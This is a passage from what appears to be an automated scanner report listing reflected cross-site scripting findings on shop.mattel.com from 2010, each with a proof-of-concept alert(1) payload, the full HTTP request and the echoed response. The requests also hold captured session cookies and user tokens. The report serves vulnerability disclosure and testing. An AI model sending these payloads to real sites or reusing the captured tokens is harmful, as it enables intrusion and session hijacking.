The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a0b95--><script>alert(1)</script>cbd1ff41310 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /brand/index.jsp?a0b95--><script>alert(1)</script>cbd1ff41310=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:07 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35911


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<!-- === Request Query String: a0b95--><script>alert(1)</script>cbd1ff41310=1 -->
...[SNIP]...

1.6. http://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92aee"-alert(1)-"f0867c1b267 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/index.jsp?92aee"-alert(1)-"f0867c1b267=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:07 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35879


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="92aee"-alert(1)-"f0867c1b267=1";
   </script>
...[SNIP]...

1.7. http://shop.mattel.com/cart/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /cart/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5088e"-alert(1)-"9c6b25295b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart/index.jsp?5088e"-alert(1)-"9c6b25295b4=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:34 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38137


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="http://shop.mattel.com";
    ess['qs']="5088e"-alert(1)-"9c6b25295b4=1";
   </script>
...[SNIP]...

1.8. http://shop.mattel.com/cart/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /cart/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b30d3--><script>alert(1)</script>0933ae012e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cart/index.jsp?b30d3--><script>alert(1)</script>0933ae012e0=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:35 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Language: es-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38759


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview
...[SNIP]...
<!-- === Request Query String: b30d3--><script>alert(1)</script>0933ae012e0=1 -->
...[SNIP]...

1.9. http://shop.mattel.com/category/index.jsp [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The value of the categoryId request parameter is copied into an HTML comment. The payload e6697--><script>alert(1)</script>c56b49c6298 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/index.jsp?categoryId=3718115e6697--><script>alert(1)</script>c56b49c6298 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:57 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:29:04 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31622


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<!-- === Request Query String: categoryId=3718115e6697--><script>alert(1)</script>c56b49c6298 -->
...[SNIP]...

1.10. http://shop.mattel.com/category/index.jsp [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The value of the categoryId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fed3"-alert(1)-"651a9d93d41 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/index.jsp?categoryId=37181155fed3"-alert(1)-"651a9d93d41 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:57 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:29:04 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31590


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="categoryId=37181155fed3"-alert(1)-"651a9d93d41";
   </script>
...[SNIP]...

1.11. http://shop.mattel.com/category/index.jsp [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f001c"-alert(1)-"119cc5f951e was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3741284f001c"-alert(1)-"119cc5f951e HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:29:19 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31742


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...

   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&categoryId=3741284f001c"-alert(1)-"119cc5f951e";
   </script>
...[SNIP]...

1.12. http://shop.mattel.com/category/index.jsp [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into an HTML comment. The payload 68cfa--><script>alert(1)</script>ace09a66a83 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=374128468cfa--><script>alert(1)</script>ace09a66a83 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:13 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:29:20 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31774


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&categoryId=374128468cfa--><script>alert(1)</script>ace09a66a83 -->
...[SNIP]...

1.13. http://shop.mattel.com/category/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57ab2"-alert(1)-"a83d7d56bb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/index.jsp?57ab2"-alert(1)-"a83d7d56bb0=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:52 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:28:59 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35909


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="57ab2"-alert(1)-"a83d7d56bb0=1";
   </script>
...[SNIP]...

1.14. http://shop.mattel.com/category/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d0648--><script>alert(1)</script>18bef240369 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/index.jsp?d0648--><script>alert(1)</script>18bef240369=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:53 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:29:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35941


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<!-- === Request Query String: d0648--><script>alert(1)</script>18bef240369=1 -->
...[SNIP]...

1.15. http://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
